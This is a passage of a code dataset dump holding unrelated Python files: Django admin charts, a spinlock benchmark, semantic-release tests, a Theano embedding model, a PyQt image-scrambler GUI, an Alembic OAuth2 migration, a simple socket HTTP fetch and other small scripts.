.annotate(y=Count(\"id\"))\n .order_by(\"-date\")\n )\n\n # Serialize and attach the chart data to the template context\n as_json = json.dumps(list(chart_data), cls=DjangoJSONEncoder)\n extra_context = extra_context or {\"chart_data\": as_json}\n\n # Call the superclass changelist_view to render the page\n return super().changelist_view(request, extra_context=extra_context)\n\nclass PostImageAdmin(admin.StackedInline):\n model = PostImage\n\n\n@admin.register(Post)\nclass PostAdmin(admin.ModelAdmin):\n list_display = (\"id\", \"title\", \"dateCreated\", \"viewcount\") \n ordering = (\"-dateCreated\",)\n\n def changelist_view(self, request, extra_context=None):\n\n # each column data of title and viewcount in Post objects\n chart_data = (\n Post.objects.values('title', 'viewcount')\n )\n\n # Serialize and attach the chart data to the template context\n as_json = json.dumps(list(chart_data), cls=DjangoJSONEncoder)\n extra_context = extra_context or {\"chart_data\": as_json}\n\n # Call the superclass changelist_view to render the page\n return super().changelist_view(request, extra_context=extra_context)\n inlines = [PostImageAdmin]\n\n class Meta:\n model = Post\n\n@admin.register(PostImage)\nclass PostImageAdmin(admin.ModelAdmin):\n pass","sub_path":"ivyMagazine/magazines/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":3370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"647734399","text":"\nfor i in range(0, loopNum):\n\tsubprocess.check_call(cmdResetSpin.strip().split(\" \"))\n\tsubprocess.check_call(cmdResetTable.strip().split(\" \"))\n\tstartTime = time.time()\n\tresetResult = subprocess.check_output( cmdReset.strip().split(\" \"))\n\tsbResult = subprocess.check_output( cmdSb.strip().split(\" \"))\n\tgetResult = subprocess.check_output( cmdGet.strip().split(\" \"))\n\tendTime = time.time()\n\tsubprocess.check_call(cmdStopTable.strip().split(\" \"))\n\n\tlog.write(str(i + 1) + \" > \")\n\tminTime = minPatarn.search(sbResult)\n\tlog.write(\"min: \" + minTime.group(1) + \"ms\\n\")\n\tmaxTime = maxPatarn.search(sbResult)\n\tlog.write(\"max: \" + maxTime.group(1) + \"ms\\n\")\n\tavgTime = avgPatarn.search(sbResult)\n\tlog.write(\"avg: \" + avgTime.group(1) + \"ms\\n\")\n\tlog.write(\"ple: \" + getResult)\n\n\texecutionTime = executionTime + (endTime - startTime)\n\tpleTotal = pleTotal + int(getResult)\n\tavgTotal = avgTotal + float(avgTime.group(1))\n\tsubprocess.Popen(cmdShow.strip().split(\" \"), stdout=pleData)\n\tsubprocess.Popen(cmdModifySpin.strip().split(\" \"), stdout=spinlockData)\n\ncsvDetailWriter.writerow(detailListData)\n","sub_path":"thesis/spinCounter.py","file_name":"spinCounter.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"361850208","text":"import json\nfrom unittest import TestCase\n\nimport responses\n\nfrom semantic_release.errors import ImproperConfigurationError\nfrom semantic_release.hvcs import Github, check_build_status, get_hvcs\n\nfrom . import mock\n\n\nclass HCVSHelperTests(TestCase):\n def test_get_hvcs_should_return_github(self):\n self.assertEqual(get_hvcs(), Github)\n\n @mock.patch('semantic_release.hvcs.config.get', lambda *x: 'doesnotexist')\n def test_get_hvcs_should_raise_improper_config(self):\n self.assertRaises(ImproperConfigurationError, get_hvcs)\n\n @mock.patch('semantic_release.hvcs.Github.check_build_status')\n def test_check_build_status(self, mock_github_helper):\n check_build_status('owner', 'name', 'ref')\n mock_github_helper.assert_called_once_with('owner', 'name', 'ref')\n\n\nclass GithubCheckBuildStatusTests(TestCase):\n url = ('https://api.github.com/repos/relekang/rmoq/commits/'\n '6dcb09b5b57875f334f61aebed695e2e4193db5e/status')\n\n def get_response(self, status):\n return json.dumps({\n \"state\": status,\n \"sha\": \"6dcb09b5b57875f334f61aebed695e2e4193db5e\",\n \"total_count\": 2,\n })\n\n @responses.activate\n def test_should_return_false_if_pending(self):\n responses.add(\n responses.GET,\n self.url,\n body=self.get_response('pending'),\n content_type='application/json'\n )\n self.assertFalse(Github.check_build_status('relekang', 'rmoq',\n '6dcb09b5b57875f334f61aebed695e2e4193db5e'))\n\n @responses.activate\n def test_should_return_false_if_failure(self):\n responses.add(\n responses.GET,\n self.url,\n body=self.get_response('failure'),\n content_type='application/json'\n )\n self.assertFalse(Github.check_build_status('relekang', 'rmoq',\n '6dcb09b5b57875f334f61aebed695e2e4193db5e'))\n\n @responses.activate\n def test_should_return_true_if_success(self):\n responses.add(\n responses.GET,\n self.url,\n body=self.get_response('success'),\n content_type='application/json'\n )\n self.assertTrue(Github.check_build_status('relekang', 'rmoq',\n '6dcb09b5b57875f334f61aebed695e2e4193db5e'))\n","sub_path":"tests/test_hvcs.py","file_name":"test_hvcs.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"155446838","text":"import requests\nfrom lxml import etree\n\nheaders = {\n 'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36',\n}#请求头\n\nurl = 'https://www.qiushibaike.com/hot/text/'\nres = requests.get(url,headers = headers)\nselector = etree.HTML(res.text)\nid = selector.xpath('//*[@id=\"qiushi_tag_120325407\"]/div[1]/a[2]/h2/text()')\nprint(id)\n","sub_path":"spider/零散单子/xapth测试-糗事百科.py","file_name":"xapth测试-糗事百科.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"71282768","text":"#encoding=utf-8\r\n'''\r\n@author: Liu Zemin\r\nFunctions and Application : \r\nmodel\r\n'''\r\n\r\nimport numpy\r\nimport theano\r\nfrom theano import tensor\r\nfrom theano.ifelse import ifelse\r\nimport directedGraphLSTMModel\r\n\r\ndef proxEmbedBySubgraphModel(options, tparams):\r\n \"\"\"\r\n \"\"\"\r\n trainingPairs=tensor.tensor3('trainingPairs',dtype='int64') # 3D tensor,shape=#(triples)*4*2\r\n xs=tensor.matrix('xs', dtype='int64') # shape=nsamples*maxlen\r\n masks=tensor.tensor3('masks', dtype=theano.config.floatX) # @UndefinedVariable # shape=nsamples*maxlen*maxlen\r\n subgraph_lens=tensor.vector('subgraph_lens', dtype='int64') # shape=nsamples*0\r\n lengths=tensor.vector('lengths',dtype='int64') # shape=#(xs) * 0\r\n wordsEmbeddings=tensor.matrix('wordsEmbeddings', dtype=theano.config.floatX) # @UndefinedVariable # shape=#(words) * wordsDimension\r\n \r\n buffer_tensor=tensor.tensor3('buffer_tensor', dtype=theano.config.floatX) # @UndefinedVariable # shape=maxlen*maxlen*dimension\r\n nodesLens=tensor.matrix('nodesLens', dtype='int64') # shape=nsamples*maxlen\r\n \r\n def _processTuple(index , lossSum):\r\n tuple=trainingPairs[index] \r\n \r\n def _processSubgraph(i):\r\n length=lengths[i]\r\n x=xs[i,:length] \r\n mask=masks[i,:length,:length] \r\n nodesLen=nodesLens[i,:length] \r\n emb=directedGraphLSTMModel.directedGraphLSTMModel(options, tparams, x, mask, wordsEmbeddings, buffer_tensor, nodesLen) \r\n return emb \r\n \r\n def iftFunc(): \r\n embx=tensor.zeros(options['dimension'],).astype(theano.config.floatX) # @UndefinedVariable \r\n return embx\r\n \r\n def iffFunc(start, end):\r\n embx=None\r\n rval,update=theano.scan(\r\n _processSubgraph,\r\n sequences=tensor.arange(start,end), \r\n )\r\n subgraph_len=subgraph_lens[start:end] \r\n \r\n rval=discountModel(options['discount_alpha'], subgraph_len)[:,None]*rval\r\n embx=rval.max(axis=0)\r\n \r\n return embx\r\n \r\n start=tuple[0][0] \r\n end=tuple[1][1] \r\n emb1=None \r\n emb1=iffFunc(start,end)\r\n \r\n start=tuple[2][0] \r\n end=tuple[3][1]\r\n emb2=None \r\n emb2=iffFunc(start,end)\r\n \r\n loss=0\r\n param=options['objective_function_param'] \r\n if options['objective_function_method']=='sigmoid': \r\n loss=-tensor.log(tensor.nnet.sigmoid(param*(tensor.dot(emb1,tparams['w'])-tensor.dot(emb2,tparams['w'])))) # sigmoid\r\n else: # hinge-loss\r\n value=param + tensor.dot(emb2,tparams['w']) - tensor.dot(emb1,tparams['w'])\r\n loss=value*(value>0)\r\n \r\n return tensor.cast(loss+lossSum, theano.config.floatX) # @UndefinedVariable\r\n \r\n rval, update=theano.scan(\r\n _processTuple,\r\n sequences=tensor.arange(trainingPairs.shape[0]), \r\n outputs_info=tensor.constant(0., dtype=theano.config.floatX), # @UndefinedVariable\r\n )\r\n \r\n cost=rval[-1]\r\n cost+=options['decay']*(tparams['Wi'] ** 2).sum()\r\n cost+=options['decay']*(tparams['Wf'] ** 2).sum()\r\n cost+=options['decay']*(tparams['Wo'] ** 2).sum()\r\n cost+=options['decay']*(tparams['Wc'] ** 2).sum()\r\n cost+=options['decay']*(tparams['Ui'] ** 2).sum()\r\n cost+=options['decay']*(tparams['Uf'] ** 2).sum()\r\n cost+=options['decay']*(tparams['Uo'] ** 2).sum()\r\n cost+=options['decay']*(tparams['Uc'] ** 2).sum()\r\n cost+=options['decay']*(tparams['bi'] ** 2).sum()\r\n cost+=options['decay']*(tparams['bf'] ** 2).sum()\r\n cost+=options['decay']*(tparams['bo'] ** 2).sum()\r\n cost+=options['decay']*(tparams['bc'] ** 2).sum()\r\n \r\n return trainingPairs, xs, masks, lengths, subgraph_lens, wordsEmbeddings, buffer_tensor, nodesLens, cost\r\n\r\n\r\ndef discountModel(alpha,length):\r\n \"\"\"\r\n discount\r\n \"\"\"\r\n return tensor.exp(alpha*length*(-1))\r\n","sub_path":"D2AGE/symmetric/proxEmbedBySubgraphModel.py","file_name":"proxEmbedBySubgraphModel.py","file_ext":"py","file_size_in_byte":4142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"218514128","text":"#!/usr/bin/python3.8\n\nimport sys\nimport os\nimport string\nimport re\nimport time\nimport subprocess\nimport datetime\nfrom sys import argv\n\n# import library\nscript_path = os.path.dirname(__file__)\nlib_path = script_path + \"/../../lib/pyLib\"\nsys.path.append(lib_path)\n\nfrom tqdm import tqdm\n\ndef progress_observe(base_bar_name, full_bar, speed_low, speed_high, max_count, finish_flag, error_flag):\n count = 0\n while (not os.path.exists(finish_flag)):\n if count == 0:\n bar_name = base_bar_name\n progress_bar(bar_name, full_bar, speed_low, speed_high, finish_flag, error_flag)\n else:\n print (base_bar_name, \": is nearly done, let wait one more time!\")\n bar_name = base_bar_name + ' (' + str(count) + ')'\n progress_bar(bar_name, full_bar, speed_low, speed_high, finish_flag, error_flag)\n count += 1\n if count == max_count:\n print (\"Progress %s is taking too long time!\" % base_bar_name)\n break\n\ndef progress_bar(bar_name, full_bar, speed_low, speed_high, finish_flag, error_flag):\n with tqdm(total=full_bar, desc=bar_name, bar_format=\"{l_bar}{bar} [ time left: {remaining} ]\") as pbar:\n for i in range(full_bar):\n if os.path.exists(error_flag):\n print (\"ERROR FOUND! Plz check Error.log\")\n stop_progress()\n if os.path.exists(finish_flag):\n pbar.n = full_bar\n pbar.refresh()\n else:\n time.sleep(speed_low)\n pbar.update()\n\ndef progress_bar2(bar_name, full_bar, speed_low, speed_high, max_count, finish_flag, error_flag):\n count = 0\n with tqdm(total=full_bar, desc=bar_name, bar_format=\"{l_bar}{bar} [ time left: {remaining} ]\") as pbar:\n if os.path.exists(finish_flag):\n pbar.n = full_bar\n pbar.refresh()\n else:\n while (not os.path.exists(finish_flag)):\n for i in range(full_bar):\n time.sleep(speed_low) \n if os.path.exists(error_flag):\n print (\"ERROR FOUND! Plz check Error.log\")\n stop_progress()\n elif os.path.exists(finish_flag):\n pbar.n = full_bar\n pbar.refresh()\n break\n elif count != 0:\n pbar.n = i\n pbar.refresh()\n else:\n pbar.update()\n count = count + 1\n if count == max_count:\n print (\"Progress %s is taking too long time!\" % base_bar_name)\n break\n \ndef remove_finish_flag():\n if os.path.exists('finish_read_input'):\n os.remove(\"finish_read_input\")\n if os.path.exists('finish_gen_rtl'):\n os.remove(\"finish_gen_rtl\")\n if os.path.exists('finish_gen_html'):\n os.remove(\"finish_gen_html\")\n if os.path.exists('finish_gen_uvm'):\n os.remove(\"finish_gen_uvm\")\n\ndef stop_progress():\n remove_finish_flag()\n open(\"finish_all\", 'w').close()\n sys.exit()\n \nremove_finish_flag()\n#progress_observe(\"Read Input Spec \", 100, 0.03, 0.01, 5, \"finish_read_input\", \"Error.log\")\n#progress_observe(\"Generate RTL \", 100, 0.03, 0.01, 5, \"finish_gen_rtl\", \"Error.log\")\n#progress_observe(\"Generate HTML \", 100, 0.03, 0.01, 5, \"finish_gen_html\", \"Error.log\")\nprogress_bar2(\"Read Input Spec \", 100, 0.03, 0.01, 15, \"finish_read_input\", \"Error.log\")\nprogress_bar2(\"Generate RTL \", 100, 0.03, 0.01, 15, \"finish_gen_rtl\", \"Error.log\")\nprogress_bar2(\"Generate HTML \", 100, 0.03, 0.01, 15, \"finish_gen_html\", \"Error.log\")\nprogress_bar2(\"Generate UVM \", 100, 0.03, 0.01, 15, \"finish_gen_uvm\", \"Error.log\")\n\nremove_finish_flag()\nopen(\"finish_all\", 'w').close()\n","sub_path":"work/script/progress_bar.py","file_name":"progress_bar.py","file_ext":"py","file_size_in_byte":3467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"354112943","text":"# This Python file uses the following encoding: utf-8\nimport sys\nimport os\nfrom PySide2.QtWidgets import QApplication, QMainWindow\nfrom PyQt5 import uic, QtWidgets, QtCore, QtGui\n\nimport random\nimport numpy\nimport io\n\nimport tkinter as tk\nfrom tkinter.filedialog import askopenfilename\n\n\nfrom PIL import Image\nfrom PIL.ImageQt import ImageQt\n\nfrom ScramblerDVB import ScramblerDVB\nfrom ScramblerAES import ScramblerAES\nfrom ScramblerV34 import ScramblerV34\n\nSCRIPT_DIRECTORY = os.path.dirname(os.path.abspath(__file__))\n\nclass MainWindow(QtWidgets.QDialog):\n\n def __init__(self):\n #QMainWindow.__init__(self)\n super(MainWindow, self).__init__()\n uic.loadUi(os.path.join(SCRIPT_DIRECTORY, 'scramblergui.ui'), self)\n\n #setting up DVB event handlers\n self.loadFileBtnDVB.clicked.connect(self.loadButtonClicked)\n self.scrambleBtnDVB.clicked.connect(self.scrambleDVBButtonClicked)\n self.descrambleBtnDVB.clicked.connect(self.descrambleDVBButtonClicked)\n\n #setting up V34 event handlers\n self.loadFileBtnV34.clicked.connect(self.loadButtonClicked)\n self.scrambleBtnV34.clicked.connect(self.scrambleV34ButtonClicked)\n self.descrambleBtnV34.clicked.connect(self.descrambleV34ButtonClicked)\n\n #setting up AES event handlers\n self.loadFileBtnAES.clicked.connect(self.loadButtonClicked)\n self.scrambleBtnAES.clicked.connect(self.scrambleAESButtonClicked)\n self.descrambleBtnAES.clicked.connect(self.descrambleAESButtonClicked)\n\n self.show()\n\n self.input_bnp = 0\n self.size_of_bitmap = 0\n self.raw_binary = []\n self.img = 0\n\n self.scramblerDVB = 0\n self.output_imageDVB = 0\n self.noisedImageDVB = 0\n\n self.AES = 0\n self.output_imageAES = 0\n self.noisedImageAES = 0\n self.noisedImageAES_raw = []\n\n self.scramblerV34 = 0\n self.output_imageV34 = 0\n self.noisedImageV34 = 0\n\n self.output_imageNoise = 0\n self.noisedImage_raw = []\n self.diffImage = 0\n\n\n # scramble V34 button event handler\n def scrambleV34ButtonClicked(self):\n if self.size_of_bitmap == 0: # return if no image found\n return\n\n self.scramblerV34 = ScramblerV34(self.size_of_bitmap, self.raw_binary, self.textBrowserV34)\n\n scrambledImage = self.scramblerV34.scramble()\n self.noisedImageV34 = self.addNoise(scrambledImage, int(self.comboBoxV34.currentText() ))\n\n self.output_imageV34 = Image.new('1', (self.size_of_bitmap, self.size_of_bitmap))\n pixels = self.output_imageV34.load()\n for i in range(self.output_imageV34.size[0]): # For every pixel:\n for j in range(self.output_imageV34.size[1]):\n pixels[i, j] = self.noisedImageV34[(self.size_of_bitmap * i) + j]\n\n\n self.showResultInGUI(self.afterImgLabelV34, self.output_imageV34)\n\n\n\n # descramble V34 button event handler\n def descrambleV34ButtonClicked(self):\n if self.scramblerV34 == 0: # return if scrambling hasn't been done\n return\n\n descrambledImage = self.scramblerV34.descramble(self.noisedImageV34)\n self.output_imageV34 = Image.new('1', (self.size_of_bitmap, self.size_of_bitmap))\n pixels = self.output_imageV34.load()\n\n for i in range(self.output_imageV34.size[0]): # For every pixel:\n for j in range(self.output_imageV34.size[1]):\n pixels[i, j] = descrambledImage[(self.size_of_bitmap * i) + j]\n\n\n self.showResultInGUI(self.afterImgLabelV34, self.output_imageV34)\n\n self.setupDiffImage(self.scramblerV34)\n self.showResultInGUI(self.diffLabelV34, self.diffImage)\n\n\n\n # scramble AES button event handler\n def scrambleAESButtonClicked(self):\n if self.size_of_bitmap == 0:\n return\n\n self.AES = ScramblerAES(self.size_of_bitmap, self.raw_binary, self.textBrowserAES)\n self.textBrowserAES.append( str(self.AES.key) )\n\n encryptedImage = self.AES.encrypt()\n\n self.showResultInGUI(self.afterImgLabelAES, encryptedImage)\n\n\n\n # descramble AES button event handler\n def descrambleAESButtonClicked(self):\n if self.AES == 0: # return if scrambling hasn't been done\n return\n\n decryptedImage = self.AES.decrypt()\n\n self.output_imageAES = Image.new('1', (self.size_of_bitmap, self.size_of_bitmap))\n pixels = self.output_imageAES.load()\n\n for i in range(self.output_imageAES.size[0]): # For every pixel:\n for j in range(self.output_imageAES.size[1]):\n pixels[i, j] = decryptedImage[(self.size_of_bitmap * i) + j]\n\n self.showResultInGUI(self.afterImgLabelAES, self.output_imageAES)\n\n\n\n #scramble DVB button event handler\n def scrambleDVBButtonClicked(self):\n if self.size_of_bitmap == 0: # return if no image found\n return\n\n self.scramblerDVB = ScramblerDVB(self.size_of_bitmap, self.raw_binary, self.textBrowserDVB)\n scrambledImage = self.scramblerDVB.scramble()\n self.noisedImageDVB = self.addNoise(scrambledImage, int(self.comboBoxDVB.currentText() ))\n\n self.textBrowserDVB.append( str(self.noisedImageDVB) )\n self.output_imageDVB = Image.new('1', (self.size_of_bitmap, self.size_of_bitmap))\n pixels = self.output_imageDVB.load()\n for i in range(self.output_imageDVB.size[0]): # For every pixel:\n for j in range(self.output_imageDVB.size[1]):\n pixels[i, j] = self.noisedImageDVB[(self.size_of_bitmap * i) + j]\n #pixels[i, j] = scrambledImage[(self.size_of_bitmap * i) + j]\n\n self.showResultInGUI(self.afterImgLabelDVB, self.output_imageDVB)\n self.showResultInGUI(self.afterImgLabelDVB, self.output_imageDVB)\n\n\n\n #descramble DVB button event handler\n def descrambleDVBButtonClicked(self):\n if self.scramblerDVB == 0: #catch if no image to descramble\n return\n\n descrambledImage = self.scramblerDVB.descramble(self.noisedImageDVB)\n self.output_imageDVB = Image.new('1', (self.size_of_bitmap, self.size_of_bitmap))\n pixels = self.output_imageDVB.load()\n\n for i in range(self.output_imageDVB.size[0]): # For every pixel:\n for j in range(self.output_imageDVB.size[1]):\n pixels[i, j] = descrambledImage[(self.size_of_bitmap * i) + j]\n\n self.showResultInGUI(self.afterImgLabelDVB, self.output_imageDVB)\n\n self.setupDiffImage(self.scramblerDVB)\n self.showResultInGUI(self.diffLabelDVB, self.diffImage)\n\n\n\n # calculating image difference\n def setupDiffImage(self, scrambler):\n output_diff = []\n for i in range(len(self.noisedImage_raw)):\n newPixel = scrambler.descrambler_output[i] ^ self.raw_binary[i]\n output_diff.append(newPixel)\n\n self.diffImage = Image.new('1', (self.size_of_bitmap, self.size_of_bitmap))\n pixels = self.diffImage.load()\n\n for i in range(self.diffImage.size[0]): # For every pixel:\n for j in range(self.diffImage.size[1]):\n pixels[i, j] = output_diff[(self.size_of_bitmap * i) + j]\n\n\n\n #load button event handler\n def loadButtonClicked(self):\n self.showLoadDialog()\n self.loadImage()\n\n\n\n #shows menu for choosing .bnp file\n def showLoadDialog(self):\n root = tk.Tk()\n root.withdraw()\n self.input_bnp = askopenfilename()\n\n\n\n # shows an image in the chosen label\n def showImageInGUI(self, label, imagePath):\n myPixmap = QtGui.QPixmap( imagePath )\n myScaledPixmap = myPixmap.scaled(label.size(), QtCore.Qt.KeepAspectRatio)\n label.setPixmap(myScaledPixmap)\n\n\n\n def showResultInGUI(self, label, image):\n imQt = QtGui.QImage(ImageQt(image))\n myPixmap = QtGui.QPixmap.fromImage( imQt )\n\n myScaledPixmap = myPixmap.scaled(label.size(), QtCore.Qt.KeepAspectRatio)\n label.setPixmap(myScaledPixmap)\n\n\n\n # reading bitmap from file and writing pixel data into an array\n def loadImage(self):\n if not self.input_bnp: #return if no image was loaded\n return\n\n self.raw_binary.clear() # clearing raw_binary in case it wasn't empty\n\n self.img = Image.open(self.input_bnp)\n\n thresh = 200\n fn = lambda x : 1 if x > thresh else 0\n self.img = self.img.convert('L').point(fn, mode='1')\n\n self.size_of_bitmap = self.img.size[0]\n pixels = self.img.load()\n for i in range(self.img.size[0]):\n for j in range(self.img.size[1]):\n self.raw_binary.append(pixels[i, j])\n\n # setting noise strength to the value of current tab's value\n if self.tabWidget.currentIndex() == 0:\n noiseStrength = int(self.comboBoxDVB.currentText())\n elif self.tabWidget.currentIndex() == 1:\n noiseStrength = int(self.comboBoxV34.currentText())\n elif self.tabWidget.currentIndex() == 2:\n noiseStrength = int(self.comboBoxAES.currentText())\n\n self.noisedImage_raw = self.addNoise(self.raw_binary, noiseStrength)\n\n self.output_imageNoise = Image.new('1', (self.img.size[0], self.img.size[1]))\n pixels = self.output_imageNoise.load()\n\n for i in range(self.output_imageNoise.size[0]): # For every pixel:\n for j in range(self.output_imageNoise.size[1]):\n pixels[i, j] = self.noisedImage_raw[(self.size_of_bitmap * i) + j]\n\n\n self.showResultInGUI(self.beforeImgLabelAES, self.output_imageNoise)\n self.showResultInGUI(self.beforeImgLabelDVB, self.output_imageNoise)\n self.showResultInGUI(self.beforeImgLabelV34, self.output_imageNoise)\n\n\n\n def addNoise(self, rawImage, noiseRatio):\n zeroCounter = 0\n oneCounter = 0\n noisedImage = []\n for i in range( len(rawImage) ):\n if rawImage[i] == 0:\n zeroCounter += 1\n oneCounter = 0\n elif rawImage[i] == 1:\n oneCounter += 1\n zeroCounter = 0\n\n noiseProb = (zeroCounter + oneCounter) / noiseRatio\n newRandom = random.randint(0, 100)\n if newRandom < noiseProb:\n noisedImage.append(1^rawImage[i]) # swap the bit\n else:\n noisedImage.append(rawImage[i])\n\n return noisedImage\n\n\n\n\n\n\nif __name__ == \"__main__\":\n app = QApplication([])\n window = MainWindow()\n window.show()\n sys.exit(app.exec_())\n\n\n######################################\n######################################\n\n\n# WHITE DOTS = DIFF IN IMAGES\n\n","sub_path":"ScramblersGUI/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"399124045","text":"from tkinter import *\n\ndef string(n):\n if n == 0:\n print(\"ноль\")\n units = [' ', 'один', 'два', 'три', 'четыре', 'пять', 'шесть', 'семь', 'восемь', 'девять']\n dozens = [' ', 'десять', 'двадцать', 'тридцать', 'сорок', 'пятьдесят', 'шестьдесят', 'семьдесят', 'восемьдесят',\n 'девяносто']\n hundreds = [' ', 'сто', 'двести', 'триста', 'четыресто', 'пятьсот', 'шестьсот', 'семьсот', 'восемьсот', 'девятьсот']\n thousands = [' ', 'одна тысяча', 'две тысячи', 'три тысячи', 'четыре тысячи', 'пять тысяч', 'шесть тысяч',\n 'семь тысяч', 'восемь тысяч', 'девять тысяч']\n tricks = [' ', 'одиннадцать', 'двенадцать', 'тринадцать', 'четырнадцать', 'пятнадцать', 'шестьнадцать',\n 'семьнадцать', 'восемьнадцать', 'девятьнадцать']\n new_thousands = (n % 10000) // 1000\n new_hundreds = (n % 1000) // 100\n new_dozens = (n % 100) // 10\n new_units = n % 10\n\n if len(str(n)) == 1:\n print(tricks[new_units])\n elif len(str(n)) == 2:\n print(dozens[new_dozens], units[new_units])\n elif len(str(n)) == 3:\n print(hundreds[new_hundreds], dozens[new_dozens], units[new_units])\n elif len(str(n)) == 4:\n print(thousands[new_thousands], hundreds[new_hundreds], dozens[new_dozens], units[new_units])\n\n\n\nwindow = Tk()\n\nwindow.title('Jeka')\nwindow.geometry('480x360')\nwindow[\"bg\"] = \"white\"\n\nentry = Entry(window , width = 100)\nentry.grid(row=55, column=55, columnspan=55)\n\n","sub_path":"number in str (tkinter).py","file_name":"number in str (tkinter).py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"640055298","text":"\"\"\"empty message\n\nRevision ID: 5911f8b5419a\nRevises: \nCreate Date: 2021-01-14 15:09:11.421137\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '5911f8b5419a'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('oauth2_client',\n sa.Column('client_id', sa.String(length=48), nullable=True),\n sa.Column('client_secret', sa.String(length=120), nullable=True),\n sa.Column('client_id_issued_at', sa.Integer(), nullable=False),\n sa.Column('client_secret_expires_at', sa.Integer(), nullable=False),\n sa.Column('client_metadata', sa.Text(), nullable=True),\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_oauth2_client_client_id'), 'oauth2_client', ['client_id'], unique=False)\n op.create_table('oauth2_code',\n sa.Column('code', sa.String(length=120), nullable=False),\n sa.Column('client_id', sa.String(length=48), nullable=True),\n sa.Column('redirect_uri', sa.Text(), nullable=True),\n sa.Column('response_type', sa.Text(), nullable=True),\n sa.Column('scope', sa.Text(), nullable=True),\n sa.Column('nonce', sa.Text(), nullable=True),\n sa.Column('auth_time', sa.Integer(), nullable=False),\n sa.Column('code_challenge', sa.Text(), nullable=True),\n sa.Column('code_challenge_method', sa.String(length=48), nullable=True),\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('code')\n )\n op.create_table('oauth2_token',\n sa.Column('client_id', sa.String(length=48), nullable=True),\n sa.Column('token_type', sa.String(length=40), nullable=True),\n sa.Column('access_token', sa.String(length=255), nullable=False),\n sa.Column('refresh_token', sa.String(length=255), nullable=True),\n sa.Column('scope', sa.Text(), nullable=True),\n sa.Column('revoked', sa.Boolean(), nullable=True),\n sa.Column('issued_at', sa.Integer(), nullable=False),\n sa.Column('expires_in', sa.Integer(), nullable=False),\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('access_token')\n )\n op.create_index(op.f('ix_oauth2_token_refresh_token'), 'oauth2_token', ['refresh_token'], unique=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index(op.f('ix_oauth2_token_refresh_token'), table_name='oauth2_token')\n op.drop_table('oauth2_token')\n op.drop_table('oauth2_code')\n op.drop_index(op.f('ix_oauth2_client_client_id'), table_name='oauth2_client')\n op.drop_table('oauth2_client')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/5911f8b5419a_.py","file_name":"5911f8b5419a_.py","file_ext":"py","file_size_in_byte":2976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"395181856","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 3 23:28:52 2018\n\n@author: eric.benhamou, david sabbagh, valentin melot\n\"\"\"\n\nimport os.path\n\n# Image resolution\nDPI = 300\n\n\ndef delete_all_png_file():\n for item in os.listdir('.'):\n if item.endswith(\".png\"):\n try:\n os.remove(os.path.join(os.getcwd(), item))\n except Exception as e:\n print(e.message)\n return\n\n\ndef save_figure(plt, prefix, suffix, lgd=None):\n filename = '{}_figure_{}.png'.format(prefix, suffix)\n count = 1\n while os.path.isfile(filename):\n count = count + 1\n filename = '{}_figure_{}({}).png'.format(prefix, suffix, count)\n if lgd is not None:\n plt.savefig(filename, bbox_extra_artists=(\n lgd,), bbox_inches='tight', dpi=DPI)\n else:\n plt.savefig(filename, dpi=DPI)\n plt.show(block=False)\n print('saved figure as \\'{}\\''.format(filename))\n return\n","sub_path":"backup/origin/cHMM-master/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"388277137","text":"'''\n\nsocket请求报文并保存报文内容\n\n'''\n\nimport socket\nimport os\n\nss = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n\nss.connect(('14.215.177.38',80))\n\ndef send_http():\n ss.send('GET / HTTP/1.1\\r\\nHost: www.baidu.com\\r\\n\\r\\n'.encode())\n msg = ss.recv(10240)\n return msg\n\ndef file_copy(msg):\n load_copy = input('请输入保存文件名:')\n load_copy += '.txt'\n fp = open(load_copy,'w')\n fp.write(msg.decode())\n fp.close()\n\n load = os.path.dirname(__file__) + '/{}'.format(load_copy)\n print('报文保存路径:{}'.format(load))\n\nxx = send_http()\nfile_copy(xx)\n\n","sub_path":"python_socket/homework2_server.py","file_name":"homework2_server.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"497261071","text":"num = 3\nif(num ==4):\n print(\"correct\")\nelse:\n print(\"you got to try again 